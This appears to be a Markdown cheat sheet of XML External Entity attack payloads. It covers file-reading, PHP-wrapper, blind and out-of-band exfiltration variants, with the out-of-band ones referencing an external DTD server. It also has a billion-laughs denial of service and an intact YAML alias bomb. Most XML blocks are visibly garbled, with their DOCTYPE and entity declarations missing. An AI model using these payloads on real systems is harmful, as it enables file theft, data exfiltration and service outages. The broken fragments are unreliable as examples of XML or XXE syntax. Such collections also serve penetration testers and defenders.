# XML External Entity
An XML External Entity attack is a type of attack against an application that parses XML input
## Exploit
Basic Test
```xml
]>
John
&example;
```
## Basic XXE
Classic XXE
```xml
]>
&file;
```
```xml
]>&xxe;
```
```xml
]>&xxe;
```
Classic XXE Base64 encoded
```xml
%init; ]>
```
## PHP Wrapper inside XXE
```xml
]>
Jean &xxe; Dupont
00 11 22 33 44
42 rue du CTF
75000
Paris
```
```xml
]>
&xxe;
```
## Deny of service
Deny Of Service - Billion Laugh Attack
```xml
]>
&a4;
```
Yaml attack
```xml
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
## Blind XXE
Blind XXE
```xml
]
>
&callhome;
```
XXE OOB Attack (Yunusov, 2013)
```xml
&send;
File stored on http://publicServer.com/parameterEntity_oob.dtd
">
%all;
```
XXE OOB with DTD and PHP filter
```xml
%sp;
%param1;
]>
&exfil;
File stored on http://127.0.0.1/dtd.xml
">
```
XXE Inside SOAP
```xml
%dtd;]>]]>
```
## Thanks to
* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)